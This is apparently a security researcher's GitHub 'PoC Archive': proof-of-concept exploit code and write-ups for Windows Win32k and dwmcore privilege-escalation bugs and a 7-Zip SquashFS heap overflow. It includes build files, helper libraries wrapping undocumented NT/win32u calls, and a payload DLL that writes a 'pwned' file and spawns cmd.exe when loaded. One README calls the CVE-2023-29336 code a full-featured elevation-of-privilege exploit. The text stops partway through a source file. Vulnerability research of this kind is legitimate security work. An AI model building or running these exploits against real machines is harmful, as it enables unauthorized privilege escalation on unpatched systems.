├── cve-2023-23410 ├── .gitignore ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ └── 5.jpg ├── CMakeLists.txt ├── main.cpp └── README.md ├── cve-2023-29336 ├── .gitignore ├── CMakeLists.txt ├── .vscode │ ├── settings.json │ └── tasks.json ├── README.md ├── main.cpp └── visualisation │ └── src │ ├── prepare-heap-done.memorylayout.json │ └── menu-created.memorylayout.json ├── cve-2024-30051 ├── img │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── 7.png │ └── 2024-09-06-21-34-05.mp4 ├── CMakeLists.txt ├── ponylib │ ├── CMakeLists.txt │ ├── ponylib.h │ ├── ponylib.cpp │ ├── memory.h │ ├── win32u.h │ └── nt.h ├── src │ ├── CMakeLists.txt │ ├── payload.c │ ├── dcomp.h │ ├── dcomp.cpp │ └── exploit.cpp └── README.md ├── cve-2023-40481 ├── img │ ├── source.png │ └── hijacked.png ├── poc.squashfs └── README.md ├── cve-2023-21822 ├── img │ └── handyfunc.png ├── CMakeLists.txt ├── umpd.h ├── README.md ├── umpd.cpp ├── nt.h └── main.cpp └── README.md /cve-2023-23410/.gitignore: -------------------------------------------------------------------------------- 1 | build -------------------------------------------------------------------------------- /cve-2023-29336/.gitignore: -------------------------------------------------------------------------------- 1 | build 2 | _backup 3 | .vscode -------------------------------------------------------------------------------- /cve-2023-23410/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/1.png -------------------------------------------------------------------------------- /cve-2023-23410/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/2.png -------------------------------------------------------------------------------- /cve-2023-23410/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/3.png -------------------------------------------------------------------------------- /cve-2023-23410/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/4.png -------------------------------------------------------------------------------- /cve-2023-23410/img/5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-23410/img/5.jpg -------------------------------------------------------------------------------- /cve-2024-30051/img/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/1.png -------------------------------------------------------------------------------- /cve-2024-30051/img/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/2.png -------------------------------------------------------------------------------- /cve-2024-30051/img/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/3.png -------------------------------------------------------------------------------- /cve-2024-30051/img/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/4.png -------------------------------------------------------------------------------- /cve-2024-30051/img/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/5.png -------------------------------------------------------------------------------- /cve-2024-30051/img/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/6.png -------------------------------------------------------------------------------- /cve-2024-30051/img/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/7.png -------------------------------------------------------------------------------- /cve-2023-40481/img/source.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-40481/img/source.png -------------------------------------------------------------------------------- /cve-2023-40481/poc.squashfs: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-40481/poc.squashfs -------------------------------------------------------------------------------- /cve-2023-40481/img/hijacked.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-40481/img/hijacked.png -------------------------------------------------------------------------------- /cve-2023-21822/img/handyfunc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2023-21822/img/handyfunc.png -------------------------------------------------------------------------------- /cve-2024-30051/img/2024-09-06-21-34-05.mp4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/immortalp0ny/mypocs/HEAD/cve-2024-30051/img/2024-09-06-21-34-05.mp4 -------------------------------------------------------------------------------- /cve-2023-29336/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc-cve-2023-29336") 4 | 5 | add_executable("${PROJECT_NAME}" "main.cpp") -------------------------------------------------------------------------------- /cve-2023-21822/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc-cve-2023-21822") 4 | 5 | add_executable( 6 | "poc" "main.cpp" "umpd.cpp" 7 | ) -------------------------------------------------------------------------------- /cve-2024-30051/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("exploit.dwm.2024.30051") 4 | 5 | add_subdirectory("ponylib") 6 | add_subdirectory("src") -------------------------------------------------------------------------------- /cve-2023-23410/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc-cve-2023-2341") 4 | 5 | # Main library definition 6 | add_executable("${PROJECT_NAME}" "main.cpp") -------------------------------------------------------------------------------- /cve-2023-29336/.vscode/settings.json: -------------------------------------------------------------------------------- 1 | { 2 | "files.associations": { 3 | "*.rh": "cpp", 4 | "_backup": "c" 5 | }, 6 | "C_Cpp.default.configurationProvider": "ms-vscode.cmake-tools" 7 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("ponylib") 4 | 5 | set(CMAKE_CXX_STANDARD 17) 6 | set(CMAKE_CXX_STANDARD_REQUIRED ON) 7 | 8 | add_library( 9 | ${PROJECT_NAME} STATIC "ponylib.cpp" 10 | ) 11 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | # PoC Archive 3 | 4 | Here I store my proof of concepts 5 | 6 | !!! ALL INFORMATION IS PROVIDED FOR EDUCATIONAL ONLY PURPOSES !!! 7 | 8 | ## Patchdiff 9 | 10 | 11 | * [cve-2023-23410](cve-2023-23410/README.md) 12 | * [cve-2023-29336](cve-2023-29336/README.md) 13 | * [cve-2023-40481](cve-2023-40481/README.md) 14 | * [cve-2023-21822](cve-2023-21822/README.md) 15 | * [cve-2024-30051](cve-2024-30051/README.md) 16 | -------------------------------------------------------------------------------- /cve-2024-30051/src/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required (VERSION 3.8) 2 | 3 | project("poc") 4 | 5 | set(CMAKE_CXX_STANDARD 17) 6 | set(CMAKE_CXX_STANDARD_REQUIRED ON) 7 | 8 | add_executable( 9 | ${PROJECT_NAME} "dcomp.cpp" "exploit.cpp" 10 | ) 11 | target_link_libraries(${PROJECT_NAME} PUBLIC "ponylib") 12 | target_include_directories(${PROJECT_NAME} PUBLIC "${CMAKE_SOURCE_DIR}") 13 | 14 | add_library("payload" SHARED payload.c ) -------------------------------------------------------------------------------- /cve-2023-40481/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-40481 7-Zip SquashFS Heap Buffer Overflow 2 | 3 | *poc.squashfs* synthesized SquashFS which might lead to heap buffer overflow inside 7-Zip. We can trigger an overflow in **CHandler::Open2** (SquashfsHandler.cpp) particularly inside memcpy at line *1695*. If size of metadata block associated with *id_table* is equal to size of squashfs_block (8192 bytes) the check which should prevent that overflow wont be performed. 4 | 5 | ![printscreen source code related to this bug](img/source.png) 6 | 7 | Full feature exploit is possible but very unreliable due to heap mitigations and source code structure. A few allocations only available before vulnerability will be triggered. It is not enough to setup heap determinism. 8 | 9 | ![hijacked vtable](img/hijacked.png) 10 | -------------------------------------------------------------------------------- /cve-2023-29336/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | "tasks": [ 3 | { 4 | "type": "cppbuild", 5 | "label": "C/C++: cl.exe build active file", 6 | "command": "cl.exe", 7 | "args": [ 8 | "/Zi", 9 | "/EHsc", 10 | "/nologo", 11 | "/Fe${fileDirname}\\${fileBasenameNoExtension}.exe", 12 | "${file}" 13 | ], 14 | "options": { 15 | "cwd": "${fileDirname}" 16 | }, 17 | "problemMatcher": [ 18 | "$msCompile" 19 | ], 20 | "group": { 21 | "kind": "build", 22 | "isDefault": true 23 | }, 24 | "detail": "Task generated by Debugger." 25 | } 26 | ], 27 | "version": "2.0.0" 28 | } -------------------------------------------------------------------------------- /cve-2024-30051/src/payload.c: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | 5 | #include 6 | #include 7 | 8 | #pragma comment(lib, "advapi32.lib") 9 | 10 | #include 11 | 12 | void payload() { 13 | 14 | CHAR message [] = "payload.dll sucessfully executed\nBye!"; 15 | 16 | HANDLE hFile = CreateFileA("C:\\dumps\\pwned.txt", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); 17 | DWORD nbWritten = 0; 18 | 19 | WriteFile( 20 | hFile, 21 | message, 22 | (DWORD)strlen(message), 23 | &nbWritten, 24 | NULL 25 | ); 26 | CloseHandle(hFile); 27 | 28 | system("start /i C:\\Windows\\System32\\cmd.exe"); 29 | }; 30 | 31 | BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved) { 32 | 33 | switch (dwReason) 34 | { 35 | case DLL_PROCESS_ATTACH: { 36 | payload(); 37 | break; 38 | } 39 | case DLL_THREAD_ATTACH: 40 | case DLL_THREAD_DETACH: 41 | case DLL_PROCESS_DETACH: 42 | break; 43 | } 44 | return TRUE; 45 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/ponylib.h: -------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB 2 | #define _PONYLIB 3 | 4 | #include 5 | #include 6 | 7 | #define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0) 8 | 9 | namespace ponylib { 10 | template 11 | class system_function_t { 12 | protected: 13 | std::string m_libraryName; 14 | std::string m_functionName; 15 | 16 | HMODULE m_hModule; 17 | FuncTy m_pProc; 18 | 19 | bool m_bInit = false; 20 | 21 | system_function_t() {}; 22 | system_function_t& operator = (system_function_t&) 23 | { 24 | return *this; 25 | }; 26 | public: 27 | system_function_t(std::string libraryName, std::string functionName): 28 | m_libraryName(libraryName), 29 | m_functionName(functionName), 30 | m_hModule(0), 31 | m_pProc(0) 32 | { 33 | m_hModule = LoadLibraryA(m_libraryName.c_str()); 34 | if (m_hModule == NULL) { 35 | return; 36 | } 37 | m_pProc = (FuncTy)GetProcAddress(m_hModule, m_functionName.c_str()); 38 | if (m_pProc == NULL) { 39 | return; 40 | } 41 | 42 | m_bInit = true; 43 | } 44 | ~system_function_t() { 45 | FreeLibrary((HMODULE)m_hModule); 46 | m_pProc = NULL; 47 | } 48 | bool init() const { 49 | return m_bInit; 50 | } 51 | FuncTy operator*() const { 52 | return m_pProc; 53 | } 54 | }; 55 | }; 56 | 57 | #endif // _PONYLIB -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/ponylib.cpp: -------------------------------------------------------------------------------- 1 | #include "ponylib.h" 2 | #include "win32u.h" 3 | #include "nt.h" 4 | #include "memory.h" 5 | 6 | 7 | namespace ponylib::nt { 8 | nt_map_view_of_section_t kNtMapViewOfSection = nt_map_view_of_section_t("ntdll", "NtMapViewOfSection"); 9 | nt_unmap_view_of_section_t kNtUnmapViewOfSection = nt_unmap_view_of_section_t("ntdll", "NtUnmapViewOfSection"); 10 | nt_query_system_information_t kNtQuerySystemInformation = nt_query_system_information_t("ntdll", "NtQuerySystemInformation"); 11 | } 12 | namespace ponylib::win32u { 13 | nt_d_composition_create_channel_t kNtDCompositionCreateChannel = nt_d_composition_create_channel_t("win32u", "NtDCompositionCreateChannel"); 14 | nt_d_composition_destroy_channel_t kNtDCompositionDestroyChannel = nt_d_composition_destroy_channel_t("win32u", "NtDCompositionDestroyChannel"); 15 | nt_d_composition_process_channel_batch_buffer_t kNtDCompositionProcessChannelBatchBuffer = nt_d_composition_process_channel_batch_buffer_t("win32u", "NtDCompositionProcessChannelBatchBuffer"); 16 | nt_d_composition_commit_channel_t kNtDCompositionCommitChannel = nt_d_composition_commit_channel_t("win32u", "NtDCompositionCommitChannel"); 17 | nt_d_composition_create_and_bind_shared_section_t kNtDCompositionCreateAndBindSharedSection = nt_d_composition_create_and_bind_shared_section_t("win32u", "NtDCompositionCreateAndBindSharedSection"); 18 | nt_user_create_dcomposition_hwnd_target_t kNtUserCreateDCompositionHwndTarget = nt_user_create_dcomposition_hwnd_target_t("win32u", "NtUserCreateDCompositionHwndTarget"); 19 | nt_user_destroy_dcomposition_hwnd_target kNtUserDestroyDCompositionHwndTarget = nt_user_destroy_dcomposition_hwnd_target("win32u", "NtUserDestroyDCompositionHwndTarget"); 20 | } -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/memory.h: -------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB_MEMORY 2 | #define _PONYLIB_MEMORY 3 | 4 | #include 5 | 6 | #define _untyped_ptr_move_nbytes(ptr, off) (PVOID)( (PUINT8)( ptr ) + off ) 7 | 8 | namespace ponylib::memory { 9 | 10 | class memory_stream_t { 11 | protected: 12 | UINT32 m_pos; 13 | SIZE_T m_size; 14 | PVOID m_base; 15 | 16 | int m_errorCode = 0; 17 | public: 18 | memory_stream_t(): m_errorCode(STATUS_NO_MEMORY) {}; 19 | memory_stream_t(PVOID base, SIZE_T size, UINT32 startOffset = 0): m_base(base), m_size(size), m_pos(startOffset) {}; 20 | virtual ~memory_stream_t() = default; 21 | 22 | UINT32 pos() const { 23 | return m_pos; 24 | }; 25 | SIZE_T size() const { 26 | return m_size; 27 | }; 28 | PVOID base() const { 29 | return m_base; 30 | }; 31 | 32 | bool writeData(PVOID data, SIZE_T dataSize) { 33 | if (m_errorCode != 0) { 34 | return false; 35 | } 36 | 37 | if ( (m_pos + dataSize) > m_size || (m_pos + dataSize) < m_pos) { 38 | m_errorCode = STATUS_NO_MEMORY; 39 | return false; 40 | } 41 | 42 | memcpy( 43 | _untyped_ptr_move_nbytes(m_base, m_pos), 44 | data, 45 | dataSize 46 | ); 47 | 48 | m_pos += (UINT32)dataSize; 49 | m_errorCode = 0; 50 | 51 | return true; 52 | }; 53 | 54 | template 55 | bool write(Ty&& obj) { 56 | return writeData(&obj, sizeof(Ty)); 57 | }; 58 | 59 | void erase(UINT32 startOffset = 0) { 60 | memset(m_base, 0, m_pos); 61 | m_pos = startOffset; 62 | } 63 | }; 64 | 65 | } 66 | 67 | #endif // _PONYLIB_MEMORY -------------------------------------------------------------------------------- /cve-2024-30051/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2024-30051 dwmcore.dll Heap Buffer Overflow 2 | 3 | Tested on 10.0.19045 4 | 5 | The vulnerability is in the `CCommandBuffer::Initialize` function. We have an overflow because the memory size to be allocated is incorrectly calculated. The patch introduced a quick check for divisibility and in case the division operation ends with a remainder, the function terminates, btw memory is still allocated :) 6 | 7 | Attempting to trace from where the vulnerable function is reachable gave the following results. 8 | 9 | ![graph](img/1.png) 10 | 11 | From the call tree, we have three options: 12 | 13 | - `CSurfaceBrush::GetBrushParameters`. 14 | - `CPrimitiveGroup::GenerateDrawList`. 15 | - `CPrimitiveGroup::GetTextureMemoryLayoutData`. 16 | 17 | I chose `CSurfaceBrush` to create the trigger. 18 | 19 | I created a PoC that reaches the `CCommandBuffer::Initialize` code. In the creation I relied on the standard stacktrace, obtained by setting the breakpoint on the function `CSurfaceBrush::GetBrushParameters`. To create the PoC, I had to work with the `HelloComposition` example, from which it became clear how the resource tree should be constructed to reach the vulnerable code. 20 | 21 | Here is the resource tree that `HelloComposition` creates in order to draw a sprite of random size filled with a random color in a window: 22 | 23 | ![graph](img/2.png) 24 | 25 | Having analyzed the tree above and the example code, it is clear what conditions must be satisfied to reach the vulnerable code: 26 | 27 | - Since it is necessary to run the renderer, a window is needed. 28 | - The area in which the rendering takes place must be visible. 29 | - Get a handle to [[Composition Window]] via `NtUserCreateDCompositionHwndTarget`. 30 | - Open the handle on the [[Composition Window]] as `CVisualTargetMarshaler`. 31 | 32 | Below you can see the resource tree satisfying the above conditions and leading to the vulnerability trigger. 33 | 34 | ![graph](img/3.png) 35 | 36 | In the images below you can see how the overflow occurs: 37 | 38 | 1. Memory allocation. RCX register contains 0x90, the size of the allocated memory. 39 | ![graph](img/4.png) 40 | 2. RAX contains a pointer to the allocated memory. 41 | ![graph](img/6.png) 42 | 3. State before memcpy. RCX contains the address of the destination buffer (allocated in past steps). RDX contains the address of the source buffer. R8 contains the size of the data to be copied. Here you can see that 0x90 < 0x95. 43 | ![graph](img/7.png) 44 | 45 | ## Build 46 | 47 | ```shell 48 | cd cve-2024-30051 49 | cmake -S . -B build 50 | cmake --build build --config Release 51 | ``` 52 | -------------------------------------------------------------------------------- /cve-2023-21822/umpd.h: -------------------------------------------------------------------------------- 1 | #ifndef _UMPD 2 | #define _UMPD 3 | 4 | #include 5 | #include 6 | 7 | #pragma pack(push, 1) 8 | typedef struct _My_My_UMTHDR { 9 | DWORD cjSize; 10 | DWORD ulType; 11 | DWORD ulReserved1; 12 | DWORD ulReserved2; 13 | } My_My_UMTHDR, *ptr_My_My_UMTHDR; 14 | typedef struct _My_UMPDTHDR { 15 | My_My_UMTHDR umthdr; 16 | ULONG64 humpd; 17 | } My_UMPDTHDR, *ptr_My_UMPDTHDR; 18 | typedef struct _My_DRVSTARTDOCINPUT { 19 | My_UMPDTHDR umpdthdr; 20 | PVOID pso; 21 | PWSTR pwszDocName; 22 | DWORD dwJobId; 23 | } My_DRVSTARTDOCINPUT, *ptr_My_DRVSTARTDOCINPUT; 24 | typedef struct _My_STORKEANDFILLINPUT { 25 | My_UMPDTHDR umpdthdr; 26 | PVOID pso; 27 | PVOID ppo; 28 | PVOID pco; 29 | PVOID pxo; 30 | PVOID pbo; 31 | PVOID pptlBrushOrg; 32 | PVOID plineattrs; 33 | PVOID gap_50_8h; 34 | ULONG32 gap_58_4h; 35 | ULONG32 gap_5C_4h; 36 | } My_STORKEANDFILLINPUT, *ptr_My_STORKEANDFILLINPUT; 37 | typedef struct _My_DRVENABLEPDEVINPUT { 38 | My_UMPDTHDR umpdthdr; 39 | PVOID umpdcookie; 40 | PVOID pdm; 41 | PVOID pLogAddress; 42 | ULONG32 cPatterns; 43 | ULONG32 gap_34_4h; 44 | PVOID phsurfPatterns; 45 | ULONG32 cjCaps; 46 | ULONG32 gap_44_Ch[3]; 47 | ULONG32 cjDevInfo; 48 | ULONG32 gap_54_Ch[3]; 49 | PVOID hdev; 50 | PVOID pDeviceName; 51 | PVOID hPrinter; 52 | ULONG32 bSandboxedCurrentProcess; 53 | ULONG32 clientPid; 54 | ULONG64 gap_80_8h; 55 | ULONG64 gap_88_8h; 56 | ULONG64 gap_90_8h; 57 | ULONG64 gap_98_8h; 58 | ULONG32 gap_A0_4h; 59 | ULONG32 gap_A4_4h; 60 | ULONG32 gap_A8_4h; 61 | ULONG32 gap_AC_4h; 62 | } My_DRVENABLEPDEVINPUT, *ptr_My_DRVENABLEPDEVINPUT; 63 | typedef struct _My_DRVENABLESURFACEINPUT { 64 | My_UMPDTHDR umpdthdr; 65 | ULONG64 hpdev; 66 | } My_DRVENABLESURFACEINPUT, *ptr_My_DRVENABLESURFACEINPUT; 67 | #pragma pack(pop) 68 | 69 | struct My_UMSO { 70 | ULONG magic; 71 | HBITMAP hsurf; 72 | SURFOBJ so; 73 | }; 74 | 75 | typedef INT (*FuncTy_GdiPrinterThunk_)( 76 | VOID* InputBuffer, 77 | ULONGLONG SomeBufferSizeLimit, 78 | VOID* OutputBuffer, 79 | ULONGLONG OutputBufferSize 80 | ); 81 | 82 | 83 | BOOL umpd_load_printer_dll(LPWSTR printerName, HANDLE& hPrinter, LPWSTR& pDriverPath, HMODULE& hPrinterDLL); 84 | BOOL umpd_set_gdi_hooks(); 85 | VOID umpd_set_cb(INT index, FuncTy_GdiPrinterThunk_ cb, BOOL bBefore = TRUE, BOOL bCallOrig = TRUE); 86 | 87 | INT umpd_gdi_think_hook(VOID *inputBuf, ULONGLONG inputBufSize, VOID *outputBuffer, ULONGLONG outputBufSize); 88 | 89 | // https://gist.github.com/TheWover/ae7f75b8a48d3b2d5b1fe60672918a27 90 | BOOL util_hook_iat(HMODULE dll, char const* targetDLL, void *targetFunction, void* detourFunction); 91 | 92 | #endif // _UMPD -------------------------------------------------------------------------------- /cve-2024-30051/ponylib/win32u.h: -------------------------------------------------------------------------------- 1 | #ifndef _PONYLIB_WIN32U 2 | #define _PONYLIB_WIN32U 3 | 4 | #include "ponylib.h" 5 | 6 | #include 7 | #include 8 | #include 9 | 10 | 11 | namespace ponylib::win32u { 12 | /* 13 | Win32U API Proxies 14 | */ 15 | using nt_d_composition_create_channel_t = system_function_t< 16 | NTSTATUS (NTAPI*)( 17 | PHANDLE phChannel, 18 | PSIZE_T pSectionSize, 19 | PVOID* pMappedAddress 20 | ) 21 | >; 22 | using nt_d_composition_destroy_channel_t = system_function_t< 23 | NTSTATUS(NTAPI*)( 24 | HANDLE hChannel 25 | ) 26 | >; 27 | using nt_d_composition_process_channel_batch_buffer_t = system_function_t< 28 | NTSTATUS(NTAPI*)( 29 | HANDLE hChannel, 30 | DWORD dwArgStart, 31 | PDWORD pOutArg1, 32 | PDWORD pOutArg2 33 | ) 34 | >; 35 | using nt_d_composition_commit_channel_t = system_function_t< 36 | NTSTATUS(NTAPI*)( 37 | HANDLE hChannel, 38 | LPDWORD out1, 39 | LPBOOL out2, 40 | BOOL flag, 41 | HANDLE Object, 42 | PVOID a6, 43 | PVOID a7, 44 | DWORD a8 45 | ) 46 | >; 47 | using nt_d_composition_create_and_bind_shared_section_t = system_function_t< 48 | NTSTATUS(NTAPI*)( 49 | HANDLE hChannel, 50 | UINT32 hSharedSection, 51 | SIZE_T szSharedSection, 52 | PHANDLE phSection 53 | ) 54 | >; 55 | using nt_user_create_dcomposition_hwnd_target_t = system_function_t< 56 | NTSTATUS(NTAPI*)( 57 | HWND hwnd, 58 | BOOL topmost, 59 | PHANDLE phwnd 60 | ) 61 | >; 62 | using nt_user_destroy_dcomposition_hwnd_target = system_function_t< 63 | NTSTATUS(NTAPI*)( 64 | HWND hwnd, 65 | HANDLE hcomp 66 | ) 67 | >; 68 | 69 | /* 70 | Win32U API Proxies constants 71 | */ 72 | extern nt_d_composition_create_channel_t kNtDCompositionCreateChannel; 73 | extern nt_d_composition_destroy_channel_t kNtDCompositionDestroyChannel; 74 | extern nt_d_composition_process_channel_batch_buffer_t kNtDCompositionProcessChannelBatchBuffer; 75 | extern nt_d_composition_commit_channel_t kNtDCompositionCommitChannel; 76 | extern nt_d_composition_create_and_bind_shared_section_t kNtDCompositionCreateAndBindSharedSection; 77 | extern nt_user_create_dcomposition_hwnd_target_t kNtUserCreateDCompositionHwndTarget; 78 | extern nt_user_destroy_dcomposition_hwnd_target kNtUserDestroyDCompositionHwndTarget; 79 | }; 80 | 81 | #endif // _PONYLIB_WIN32U -------------------------------------------------------------------------------- /cve-2023-21822/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-21822 Win32k EoP 2 | 3 | This is recreation of great blogpost on ZDI ([link](https://www.thezdi.com/blog/2023/8/1/exploiting-a-flaw-in-bitmap-handling-in-windows-user-mode-printer-drivers)). 4 | 5 | ## Exploitation notes 6 | 7 | It reuses code inside **win32kfull** for achieving read-write capabilities. Particular **vSrcCopyS16D16Identity**. This handy function, has single argument and can be semantically interpretered as memmove. In test environment no CFG was enabled, that means i could use **memmove** directly but I wished to deal with restriction to win32kfull module. 8 | 9 | ![vSrcCopyS16D16Identity](img/handyfunc.png) 10 | 11 | ## Build 12 | 13 | ```shell 14 | cd cve-2023-21822 15 | cmake -S . -B build 16 | cmake --build build --config Release 17 | ``` 18 | 19 | ## Machine systeminfo 20 | 21 | ```shell 22 | Host Name: DESKTOP-19NG2CS 23 | OS Name: Microsoft Windows 10 Education 24 | OS Version: 10.0.19045 N/A Build 19045 25 | OS Manufacturer: Microsoft Corporation 26 | OS Configuration: Standalone Workstation 27 | OS Build Type: Multiprocessor Free 28 | Registered Owner: Windows User 29 | Registered Organization: 30 | Product ID: 00328-00000-00000-AA110 31 | Original Install Date: 27/03/2023, 14:36:49 32 | System Boot Time: 03/12/2023, 07:28:45 33 | System Manufacturer: VMware, Inc. 34 | System Model: VMware20,1 35 | System Type: x64-based PC 36 | Processor(s): 1 Processor(s) Installed. 37 | [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz 38 | BIOS Version: VMware, Inc. VMW201.00V.21805430.B64.2305221830, 22/05/2023 39 | Windows Directory: C:\Windows 40 | System Directory: C:\Windows\system32 41 | Boot Device: \Device\HarddiskVolume1 42 | System Locale: en-gb;English (United Kingdom) 43 | Input Locale: en-gb;English (United Kingdom) 44 | Time Zone: (UTC+03:00) Kuwait, Riyadh 45 | Total Physical Memory: 2,047 MB 46 | Available Physical Memory: 737 MB 47 | Virtual Memory: Max Size: 3,199 MB 48 | Virtual Memory: Available: 1,927 MB 49 | Virtual Memory: In Use: 1,272 MB 50 | Page File Location(s): C:\pagefile.sys 51 | Domain: WORKGROUP 52 | Logon Server: \\DESKTOP-19NG2CS 53 | Hotfix(s): 6 Hotfix(s) Installed. 54 | [01]: KB5017022 55 | [02]: KB5015684 56 | [03]: KB5022282 57 | [04]: KB5014032 58 | [05]: KB5016705 59 | [06]: KB5020372 60 | Network Card(s): 1 NIC(s) Installed. 61 | [01]: Bluetooth Device (Personal Area Network) 62 | Connection Name: Bluetooth Network Connection 63 | Status: Media disconnected 64 | Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 65 | ``` 66 | -------------------------------------------------------------------------------- /cve-2023-29336/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-29336 Win32K EoP 2 | 3 | Full feature exploit for elavation of privileges on Windows 1607. 4 | 5 | Writeup: 6 | 7 | * [RU](https://immortalp0ny.notion.site/In-details-writeup-of-CVE-2023-29336-9072a87f6ec8447e88a616636bc4f25d) 8 | * EN (In progress) 9 | 10 | ## Build 11 | 12 | ```shell 13 | cd cve-2023-29336 14 | cmake -S . -B build 15 | cmake --build build --config Release 16 | ``` 17 | 18 | ## Machine systeminfo 19 | 20 | ```shell 21 | Host Name: DESKTOP-V4QR2KG 22 | OS Name: Microsoft Windows 10 Enterprise N 23 | OS Version: 10.0.14393 N/A Build 14393 24 | OS Manufacturer: Microsoft Corporation 25 | OS Configuration: Standalone Workstation 26 | OS Build Type: Multiprocessor Free 27 | Registered Owner: Windows User 28 | Registered Organization: 29 | Product ID: 00329-90000-00001-AA623 30 | Original Install Date: 5/22/2023, 7:58:42 AM 31 | System Boot Time: 7/27/2023, 1:26:09 PM 32 | System Manufacturer: VMware, Inc. 33 | System Model: VMware7,1 34 | System Type: x64-based PC 35 | Processor(s): 1 Processor(s) Installed. 36 | [01]: Intel64 Family 6 Model 165 Stepping 5 GenuineIntel ~3792 Mhz 37 | BIOS Version: VMware, Inc. VMW71.00V.16722896.B64.2008100651, 8/10/2020 38 | Windows Directory: C:\Windows 39 | System Directory: C:\Windows\system32 40 | Boot Device: \Device\HarddiskVolume1 41 | System Locale: en-us;English (United States) 42 | Input Locale: en-us;English (United States) 43 | Time Zone: (UTC+03:00) Kuwait, Riyadh 44 | Total Physical Memory: 2,046 MB 45 | Available Physical Memory: 1,214 MB 46 | Virtual Memory: Max Size: 2,686 MB 47 | Virtual Memory: Available: 1,641 MB 48 | Virtual Memory: In Use: 1,045 MB 49 | Page File Location(s): C:\pagefile.sys 50 | Domain: WORKGROUP 51 | Logon Server: \\DESKTOP-V4QR2KG 52 | Hotfix(s): 4 Hotfix(s) Installed. 53 | [01]: KB3194623 54 | [02]: KB3199986 55 | [03]: KB3202790 56 | [04]: KB3200970 57 | Network Card(s): 3 NIC(s) Installed. 58 | [01]: Microsoft Kernel Debug Network Adapter 59 | Connection Name: Local Area Connection* 1 60 | DHCP Enabled: Yes 61 | DHCP Server: 255.255.255.255 62 | IP address(es) 63 | [01]: 169.254.178.35 64 | [02]: fe80::2db4:7e18:640e:b223 65 | [02]: Bluetooth Device (Personal Area Network) 66 | Connection Name: Bluetooth Network Connection 67 | Status: Media disconnected 68 | [03]: Intel(R) 82574L Gigabit Network Connection 69 | Connection Name: Ethernet0 70 | Status: Hardware not present 71 | Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. 72 | ``` 73 | -------------------------------------------------------------------------------- /cve-2023-23410/main.cpp: -------------------------------------------------------------------------------- 1 | #ifndef UNICODE 2 | #define UNICODE 3 | #endif 4 | #ifndef WIN32_LEAN_AND_MEAN 5 | #define WIN32_LEAN_AND_MEAN 6 | #endif 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | #pragma comment(lib, "httpapi.lib") 13 | 14 | int 15 | __cdecl 16 | wmain( 17 | int argc, 18 | __in_ecount(argc) wchar_t* argv[]) 19 | { 20 | 21 | ULONG ReturnLength = 0; 22 | HTTPAPI_VERSION HttpApiVersion = 